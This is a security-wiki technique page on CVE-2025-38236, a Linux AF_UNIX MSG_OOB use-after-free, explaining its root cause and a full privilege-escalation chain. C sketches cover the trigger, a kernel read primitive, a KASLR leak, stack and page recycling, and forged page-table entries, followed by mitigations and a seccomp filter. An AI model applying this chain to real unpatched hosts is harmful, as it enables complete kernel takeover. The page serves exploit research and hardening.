# AF_UNIX MSG_OOB UAF & SKB-based kernel primitives

{{#include ../../banners/hacktricks-training.md}}

## TL;DR

- Linux >= 6.9 introduced a flawed `manage_oob()` refactor (`5aa57d9f2d53`) for AF_UNIX `MSG_OOB` handling. Stacked zero-length SKBs bypassed the logic that clears `u->oob_skb`, so a normal `recv()` could free the out-of-band SKB while the pointer remained live, leading to CVE-2025-38236.
- Re-triggering `recv(..., MSG_OOB)` dereferences the dangling `struct sk_buff`. With `MSG_PEEK`, the path `unix_stream_recv_urg() -> __skb_datagram_iter() -> copy_to_user()` becomes a stable 1-byte arbitrary kernel read; without `MSG_PEEK` the primitive increments `UNIXCB(oob_skb).consumed` at offset `0x44`, i.e., adds +4 GiB to the upper dword of any 64-bit value placed at offset `0x40` inside the reallocated object.
- By draining order-0/1 unmovable pages (page-table spray), force-freeing an SKB slab page into the buddy allocator, and reusing the physical page as a pipe buffer, the exploit forges SKB metadata in controlled memory to identify the dangling page and pivot the read primitive into `.data`, vmemmap, per-CPU, and page-table regions despite usercopy hardening.
- The same page can later be recycled as the top kernel-stack page of a freshly cloned thread. `CONFIG_RANDOMIZE_KSTACK_OFFSET` becomes an oracle: by probing the stack layout while `pipe_write()` blocks, the attacker waits until the spilled `copy_page_from_iter()` length (R14) lands at offset `0x40`, then fires the +4 GiB increment to corrupt the stack value.
- A self-looping `skb_shinfo()->frag_list` keeps the UAF syscall spinning in kernel space until a cooperating thread stalls `copy_from_iter()` (via `mprotect()` over a VMA containing a single `MADV_DONTNEED` hole). Breaking the loop releases the increment exactly when the stack target is live, inflating the `bytes` argument so `copy_page_from_iter()` writes past the pipe buffer page into the next physical page.
- By monitoring pipe-buffer PFNs and page tables with the read primitive, the attacker ensures the following page is a PTE page, converts the OOB copy into arbitrary PTE writes, and obtains unrestricted kernel read/write/execute. Chrome mitigated reachability by blocking `MSG_OOB` from renderers (`6711812`), and Linux fixed the logic flaw in `32ca245464e1` plus introduced `CONFIG_AF_UNIX_OOB` to make the feature optional.

## Root cause: `manage_oob()` assumes only one zero-length SKB

`unix_stream_read_generic()` expects every SKB returned by `manage_oob()` to have `unix_skb_len() > 0`. After `93c99f21db36`, `manage_oob()` skipped the `skb == u->oob_skb` cleanup path whenever it first removed a zero-length SKB left behind by `recv(MSG_OOB)`. The subsequent fix (`5aa57d9f2d53`) still advanced from the first zero-length SKB to `skb_peek_next()` without re-checking the length. With two consecutive zero-length SKBs, the function returned the second empty SKB; `unix_stream_read_generic()` then skipped it without calling `manage_oob()` again, so the true OOB SKB was dequeued and freed while `u->oob_skb` still pointed to it.

### Minimal trigger sequence

```c
#include <sys/socket.h>

int main(void) {
    char byte;
    int socks[2];
    socketpair(AF_UNIX, SOCK_STREAM, 0, socks);
    // Each OOB send/recv pair leaves a consumed, zero-length SKB on the
    // receive queue, stacking the two empty SKBs that confuse manage_oob().
    for (int i = 0; i < 2; ++i) {
        send(socks[1], "A", 1, MSG_OOB);
        recv(socks[0], &byte, 1, MSG_OOB);
    }
    send(socks[1], "A", 1, MSG_OOB);   // SKB3, u->oob_skb = SKB3
    recv(socks[0], &byte, 1, 0);       // normal recv frees SKB3
    recv(socks[0], &byte, 1, MSG_OOB); // dereferences dangling u->oob_skb
    return 0;
}
```

## Primitives exposed by `unix_stream_recv_urg()`

1. **1-byte arbitrary read (repeatable):** `state->recv_actor()` ultimately performs `copy_to_user(user, skb_sourced_addr, 1)`. If the dangling SKB is reallocated into attacker-controlled memory (or into a controlled alias such as a pipe page), every `recv(MSG_OOB | MSG_PEEK)` copies one byte from any kernel address accepted by `__check_object_size()` to user space without crashing. Keeping `MSG_PEEK` set preserves the dangling pointer, so the read can be repeated indefinitely (see the sketch after this list).
2. **Constrained write:** When `MSG_PEEK` is clear, `UNIXCB(oob_skb).consumed += 1` increments the 32-bit field at offset `0x44`. On 0x100-aligned SKB allocations this field is the upper half of the 8-byte-aligned word at offset `0x40`, so the increment adds +4 GiB to whatever 64-bit value lives there. Turning this into a useful kernel write requires positioning a sensitive 64-bit value at that offset.

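A minimal user-space driver for the read primitive might look as follows. `set_fake_skb_data()` is a hypothetical helper standing in for whatever mechanism (here, rewriting the forged SKB inside the aliased pipe page) repoints the fake `data`/`head` fields at the target address:

```c
#include <stddef.h>
#include <stdint.h>
#include <sys/socket.h>

// Hypothetical helper: rewrites the forged sk_buff inside the aliased pipe
// page so its data pointer targets `kaddr` (implementation depends on how
// the pipe page was groomed).
void set_fake_skb_data(uint64_t kaddr);

// Leak `len` bytes starting at `kaddr`, one recv(MSG_OOB|MSG_PEEK) per byte.
// MSG_PEEK keeps u->oob_skb dangling, so the read stays repeatable.
void kread(int sock, uint64_t kaddr, uint8_t *out, size_t len)
{
    for (size_t i = 0; i < len; i++) {
        set_fake_skb_data(kaddr + i);
        recv(sock, &out[i], 1, MSG_OOB | MSG_PEEK);
    }
}
```
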
## Reallocating the SKB page for arbitrary read

1. **Drain order-0/1 unmovable freelists:** Map a huge read-only anonymous VMA and fault every page to force page-table allocation (order-0 unmovable); a sketch of this spray follows the list. Filling ~10% of RAM with page tables ensures subsequent `skbuff_head_cache` allocations pull fresh buddy pages once the order-0 lists are exhausted.
2. **Spray SKBs and isolate a slab page:** Use dozens of stream socketpairs and queue hundreds of small messages per socket (~0x100 bytes per SKB) to populate `skbuff_head_cache`. Free chosen SKBs so that a target slab page ends up entirely under attacker control, and monitor its `struct page` refcount via the emerging read primitive.
3. **Return the slab page to the buddy allocator:** Free every object on the page, then perform enough additional allocations/frees to push the page out of SLUB per-CPU partial lists and per-CPU page lists so it becomes an order-1 page on the buddy freelist.
4. **Reallocate as pipe buffer:** Create hundreds of pipes; each pipe reserves at least two 0x1000-byte data pages (`PIPE_MIN_DEF_BUFFERS`). When the buddy allocator splits an order-1 page, one half reuses the freed SKB page. To locate which pipe and which offset alias `oob_skb`, write unique marker bytes into fake SKBs stored throughout the pipe pages and issue repeated `recv(MSG_OOB | MSG_PEEK)` calls until a marker is returned.
5. **Forge a stable SKB layout:** Populate the aliased pipe page with a fake `struct sk_buff` whose `data`/`head` pointers and `skb_shared_info` structure point to arbitrary kernel addresses of interest. Because the user-copy routines on x86_64 temporarily lift SMAP (`stac`/`clac`), user-mode addresses can serve as staging buffers until kernel pointers are known.
6. **Respect usercopy hardening:** The copy succeeds against `.data`/`.bss`, vmemmap entries, per-CPU vmalloc ranges, other threads' kernel stacks, and direct-map pages that do not straddle higher-order folio boundaries. Reads against `.text` or specialized caches rejected by `__check_heap_object()` simply return `-EFAULT` without killing the process.

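A rough sketch of step 1. Read faults on an anonymous read-only mapping are backed by the shared zero page, so only page-table memory is consumed; the `MADV_NOHUGEPAGE` call is an assumption added here to keep the huge zero page from short-circuiting PTE allocation:

```c
#include <stddef.h>
#include <stdint.h>
#include <sys/mman.h>

// Touch one byte per 2 MiB of a large read-only anonymous mapping: each
// touched slot forces allocation of one PTE page (order-0 unmovable) while
// the data stays backed by the shared zero page.
void drain_order0_with_page_tables(size_t bytes)
{
    uint8_t *map = mmap(NULL, bytes, PROT_READ,
                        MAP_PRIVATE | MAP_ANONYMOUS | MAP_NORESERVE, -1, 0);
    madvise(map, bytes, MADV_NOHUGEPAGE); // avoid the PMD-level huge zero page
    volatile uint8_t sink;
    for (size_t off = 0; off < bytes; off += 2UL << 20)
        sink = map[off]; // one new PTE page per 2 MiB slot
    (void)sink;
}
```
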
## Introspecting allocators with the read primitive

- **Break KASLR:** Read any IDT descriptor from the fixed mapping at `CPU_ENTRY_AREA_RO_IDT_VADDR` (`0xfffffe0000000000`) and subtract the known handler offset to recover the kernel base (sketched below).
- **SLUB/buddy state:** Global `.data` symbols reveal `kmem_cache` bases, while vmemmap entries expose each page's type flags, freelist pointer, and owning cache. Scanning per-CPU vmalloc segments uncovers `struct kmem_cache_cpu` instances, so the next allocation address of key caches (e.g., `skbuff_head_cache`, `kmalloc-cg-192`) becomes predictable.
- **Page tables:** Instead of reading `mm_struct` (blocked by usercopy), walk the global `pgd_list` (`struct ptdesc`) and match the current `mm_struct` via `cpu_tlbstate.loaded_mm`. Once the root `pgd` is known, the primitive can traverse every page table to map PFNs for pipe buffers, page tables, and kernel stacks.

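A sketch of the KASLR break, reusing the `kread()` helper from earlier. The handler's offset inside the kernel image is a per-build constant that must be taken from the matching `vmlinux`; the value below is a placeholder:

```c
#include <stddef.h>
#include <stdint.h>

#define CPU_ENTRY_AREA_RO_IDT 0xfffffe0000000000UL
#define HANDLER_IMAGE_OFFSET  0x0UL /* placeholder: per-build constant */

void kread(int sock, uint64_t kaddr, uint8_t *out, size_t len);

// Vector 0 (divide_error) sits at the start of the read-only IDT alias.
// Reassemble the 64-bit handler address from the split x86_64 gate
// descriptor fields, then subtract its known offset in the kernel image.
uint64_t leak_kbase(int sock)
{
    uint8_t g[16];
    kread(sock, CPU_ENTRY_AREA_RO_IDT, g, sizeof(g));
    uint64_t handler = (uint64_t)g[0] | (uint64_t)g[1] << 8 |       // 15:0
                       (uint64_t)g[6] << 16 | (uint64_t)g[7] << 24 | // 31:16
                       ((uint64_t)g[8] | (uint64_t)g[9] << 8 |
                        (uint64_t)g[10] << 16 | (uint64_t)g[11] << 24) << 32;
    return handler - HANDLER_IMAGE_OFFSET;
}
```
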
## Recycling the SKB page as the top kernel-stack page

1. Free the controlled pipe page again and confirm via vmemmap that its refcount returns to zero.
2. Immediately allocate four helper pipe pages and then free them in reverse order so the buddy allocator's LIFO behavior is deterministic.
3. Call `clone()` to spawn a helper thread (see the sketch after this list); kernel stacks are four pages (16 KiB) on x86_64, so the four most recently freed pages become its stack, with the last freed page (the former SKB page) at the highest addresses.
4. Verify via page-table walk that the helper thread's top stack PFN equals the recycled SKB PFN.
5. Use the arbitrary read to observe the stack layout while steering the thread into `pipe_write()`. `CONFIG_RANDOMIZE_KSTACK_OFFSET` subtracts a random, aligned 0x0–0x3f0 from `RSP` on each syscall; repeated writes combined with `poll()`/`read()` from another thread reveal when the writer has blocked with the desired offset, i.e., when the spilled `copy_page_from_iter()` `bytes` argument (R14) sits at offset `0x40` inside the recycled page.

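A minimal sketch of step 3, assuming the pipe referenced by `wfd` has been pre-filled so the victim parks in `pipe_write()`. The flag choice and the LIFO page reuse are assumptions that must be re-verified with the read primitive:

```c
#define _GNU_SOURCE
#include <sched.h>
#include <unistd.h>

static char user_stack[0x8000]; // user-mode stack; the freshly allocated
                                // kernel stack is what we actually target

static int stack_victim(void *arg)
{
    int wfd = *(int *)arg;
    char buf[0x3000] = {0};
    write(wfd, buf, sizeof(buf)); // park in pipe_write() on a full pipe
    return 0;
}

// Spawn immediately after freeing the groomed pages so the new thread's
// 16 KiB kernel stack is carved from the most recently freed order-0 pages.
int spawn_on_recycled_stack(int *wfd)
{
    return clone(stack_victim, user_stack + sizeof(user_stack),
                 CLONE_VM | CLONE_FILES | CLONE_SIGHAND | CLONE_THREAD, wfd);
}
```
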
## Placing fake SKB metadata on the stack

- Use `sendmsg()` on an AF_UNIX datagram socket: the kernel copies the user `sockaddr_un` into a stack-resident `sockaddr_storage` (up to 108 bytes) and the ancillary data into another on-stack buffer before the syscall blocks waiting for queue space. This allows planting a precise fake SKB structure in stack memory; see the sketch after this list.
- Detect when the copy has finished by supplying a 1-byte control message located in an initially unmapped user page; `____sys_sendmsg()` faults that page in, so a helper thread polling `mincore()` on its address learns the moment the copy has happened.
- Zero-initialized padding from `CONFIG_INIT_STACK_ALL_ZERO` conveniently fills unused fields, completing a valid SKB header without extra writes.

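A sketch of both halves, under stated assumptions: how the forged `sun_path` bytes remain "sendable" while the syscall stays parked (valid address prefix versus full peer queue) is glossed over here, and the probe page must never be touched from user space before the kernel faults it in:

```c
#define _GNU_SOURCE
#include <string.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/un.h>

// Park in sendmsg() with forged bytes spilled onto the kernel stack: the
// msg_name buffer is copied into an on-stack sockaddr_storage before the
// call sleeps waiting for queue space.
void plant_fake_skb_on_stack(int dgram_sock, const void *fake, size_t n)
{
    struct sockaddr_un addr = {0};
    char body = 0;
    struct iovec iov = { .iov_base = &body, .iov_len = 1 };

    addr.sun_family = AF_UNIX;
    memcpy(addr.sun_path, fake,
           n > sizeof(addr.sun_path) ? sizeof(addr.sun_path) : n);
    struct msghdr msg = {
        .msg_name = &addr, .msg_namelen = sizeof(addr),
        .msg_iov = &iov, .msg_iovlen = 1,
    };
    sendmsg(dgram_sock, &msg, 0); // blocks with `fake` live on the stack
}

// Helper thread: `probe` is a fresh, never-touched anonymous page holding
// the 1-byte control message. The kernel's cmsg copy faults it in, so
// mincore() flips to "resident" exactly when the copy has happened.
void wait_for_copy(void *probe)
{
    unsigned char vec = 0;
    while (!(vec & 1))
        mincore(probe, 0x1000, &vec);
}
```
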
## Timing the +4 GiB increment with a self-looping frag list

- Forge `skb_shinfo(fakeskb)->frag_list` to point to a second fake SKB (stored in attacker-controlled user memory) that has `len = 0` and `next = &self`. When `skb_walk_frags()` iterates this list inside `__skb_datagram_iter()`, execution spins indefinitely because the iterator never reaches `NULL` and the copy loop makes no progress.
- The self-loop keeps the recv syscall parked inside the kernel for as long as needed. When it is time to fire the increment, change the second SKB's `next` pointer from user space to `NULL` (see the sketch after this list). The loop exits and `unix_stream_recv_urg()` immediately executes `UNIXCB(oob_skb).consumed += 1` once, hitting whatever object currently occupies the recycled stack page at offset `0x40`.

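A sketch of arming and releasing the loop. The `struct sk_buff` field offsets are build-specific placeholders that must be taken from the target kernel, and the fake SKB must live somewhere the spinning kernel code can dereference, as described above:

```c
#include <stdint.h>

// Build-specific placeholders: use the real offsets of sk_buff.next and
// sk_buff.len from the target kernel.
#define SKB_NEXT_OFF 0x00
#define SKB_LEN_OFF  0x70

static _Alignas(0x100) uint8_t fake2[0x100]; // second fake SKB

void arm_self_loop(void)
{
    *(volatile uint32_t *)(fake2 + SKB_LEN_OFF) = 0;              // len = 0
    *(volatile uint64_t *)(fake2 + SKB_NEXT_OFF) = (uint64_t)fake2; // self
}

// Fire at the exact moment the stalled copy holds the target value at
// offset 0x40 of the recycled stack page: the spinning
// __skb_datagram_iter() sees next == NULL, exits, and the single
// consumed++ lands on the stack word.
void fire_increment(void)
{
    __atomic_store_n((uint64_t *)(fake2 + SKB_NEXT_OFF), 0,
                     __ATOMIC_RELEASE);
}
```
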
## Stalling `copy_from_iter()` without userfaultfd

- Map a giant anonymous RW VMA and fault it in fully.
- Punch a single-page hole with `madvise(hole, PAGE_SIZE, MADV_DONTNEED)` and place that address inside the `iov_iter` used for `write(pipefd, user_buf, 0x3000)`.
- In parallel, call `mprotect()` on the entire VMA from another thread. The syscall grabs the mmap write lock and walks every PTE. When the pipe writer reaches the hole, the page-fault handler blocks on the mmap lock held by `mprotect()`, pausing `copy_from_iter()` at a deterministic point while the spilled `bytes` value resides on the stack segment hosted by the recycled SKB page. A sketch of the race follows.

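A sketch of the race, with illustrative sizes. The interleaving is racy by nature, so in practice the two sides must be synchronized and retried until the fault demonstrably lands while `mprotect()` holds the lock:

```c
#define _GNU_SOURCE
#include <pthread.h>
#include <sys/mman.h>
#include <unistd.h>

#define VMA_SZ (256UL << 20) // big enough that the PTE walk takes a while

// Holding the mmap write lock, mprotect() walks every PTE of the huge VMA;
// any page fault issued meanwhile sleeps until the walk finishes.
static void *mprotect_walker(void *base)
{
    mprotect(base, VMA_SZ, PROT_READ);
    mprotect(base, VMA_SZ, PROT_READ | PROT_WRITE);
    return NULL;
}

void stalled_pipe_write(int wfd)
{
    char *vma = mmap(NULL, VMA_SZ, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE | MAP_ANONYMOUS | MAP_POPULATE, -1, 0);
    char *hole = vma + VMA_SZ / 2;
    madvise(hole, 0x1000, MADV_DONTNEED); // single unbacked page in buffer

    pthread_t t;
    pthread_create(&t, NULL, mprotect_walker, vma);
    // copy_from_iter() faults at `hole`, blocks on the mmap lock, and
    // leaves the spilled byte count live on the kernel stack.
    write(wfd, hole - 0x1000, 0x3000);
    pthread_join(t, NULL);
}
```
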
## Turning the increment into arbitrary PTE writes

1. **Fire the increment:** Release the frag loop while `copy_from_iter()` is stalled so the +4 GiB increment hits the `bytes` variable.
2. **Overflow the copy:** Once the fault resumes, `copy_page_from_iter()` believes it may copy more than 4 GiB into the current pipe page. After filling the legitimate 0x2000 bytes (two pipe buffers), it executes another iteration and writes the remaining user data into whatever physical page follows the pipe buffer PFN.
3. **Arrange adjacency:** Using allocator telemetry, force the buddy allocator to place a process-owned PTE page immediately after the target pipe buffer page (e.g., alternate between allocating pipe pages and touching new virtual ranges to trigger page-table allocation until the PFNs align inside the same 2 MiB pageblock).
4. **Overwrite page tables:** Encode the desired PTE entries in the extra 0x1000 bytes of user data so the OOB `copy_from_iter()` fills the neighbouring page with attacker-chosen entries, granting user-accessible RW/RWX mappings of arbitrary kernel physical memory, which sidesteps SMEP/SMAP by construction; a sketch of the encoding follows this list.

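A sketch of step 4's payload, assuming standard x86_64 PTE bit positions and a known target physical address. Leaving NX clear makes the mappings executable wherever the upper-level entries allow it:

```c
#include <stdint.h>

#define PTE_PRESENT 0x1UL
#define PTE_RW      0x2UL
#define PTE_USER    0x4UL

// Fill the third 0x1000-byte chunk of the oversized pipe write with 512
// PTEs mapping 512 consecutive physical pages from `target_phys`, marked
// user-accessible and writable.
void build_pte_spray(uint8_t out[0x1000], uint64_t target_phys)
{
    uint64_t *pte = (uint64_t *)out;
    for (int i = 0; i < 512; i++)
        pte[i] = (target_phys + (uint64_t)i * 0x1000)
                 | PTE_PRESENT | PTE_RW | PTE_USER;
}
```
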
## Mitigations / hardening ideas

- **Kernel:** Apply `32ca245464e1479bfea8592b9db227fdc1641705` (properly revalidates SKBs) and consider disabling AF_UNIX OOB entirely via `CONFIG_AF_UNIX_OOB` (`5155cbcdbf03`) unless strictly needed. Harden `manage_oob()` with additional sanity checks (e.g., loop until `unix_skb_len() > 0`) and audit other socket protocols for similar assumptions.
- **Sandboxing:** Filter `MSG_OOB`/`MSG_PEEK` flags in seccomp profiles or higher-level broker APIs (Chrome change `6711812` now blocks renderer-side `MSG_OOB`); a seccomp sketch follows this list.
- **Allocator defenses:** Strengthening SLUB freelist randomization or enforcing per-cache page coloring would complicate deterministic page recycling; limiting per-user pipe buffer counts also reduces reallocation reliability.
- **Monitoring:** Expose high-rate page-table allocation or abnormal pipe usage via telemetry; this exploit burns large amounts of page tables and pipe buffers.

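A minimal seccomp-BPF sketch of the flag filter, assuming x86_64. A production filter must also validate `seccomp_data.arch` and handle `recvmsg()`/`sendmsg()`, whose flag words live in user memory and cannot be fully inspected from classic BPF:

```c
#include <linux/filter.h>
#include <linux/seccomp.h>
#include <stddef.h>
#include <sys/prctl.h>
#include <sys/syscall.h>

// Kill the process on any recvfrom()/sendto() whose flags (arg 3) carry
// MSG_OOB (0x1).
static struct sock_filter oob_filter[] = {
    BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, nr)),
    BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_recvfrom, 1, 0),
    BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_sendto, 0, 4),
    BPF_STMT(BPF_LD | BPF_W | BPF_ABS,
             offsetof(struct seccomp_data, args[3])), // low dword of flags
    BPF_STMT(BPF_ALU | BPF_AND | BPF_K, 0x1 /* MSG_OOB */),
    BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, 0x1, 0, 1),
    BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL_PROCESS),
    BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
};

int install_oob_filter(void)
{
    struct sock_fprog prog = {
        .len = sizeof(oob_filter) / sizeof(oob_filter[0]),
        .filter = oob_filter,
    };
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0))
        return -1;
    return prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog);
}
```
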
## References

- [Project Zero – "From Chrome renderer code exec to kernel with MSG_OOB"](https://projectzero.google/2025/08/from-chrome-renderer-code-exec-to-kernel.html)
- [Linux fix for CVE-2025-38236 (`manage_oob` revalidation)](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=32ca245464e1479bfea8592b9db227fdc1641705)
- [Chromium CL 6711812 – block `MSG_OOB` in renderers](https://chromium-review.googlesource.com/c/chromium/src/+/6711812)
- [Commit adding `CONFIG_AF_UNIX_OOB` prompt](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=5155cbcdbf03f207095f9a3794942a25aa7e5f58)

{{#include ../../banners/hacktricks-training.md}}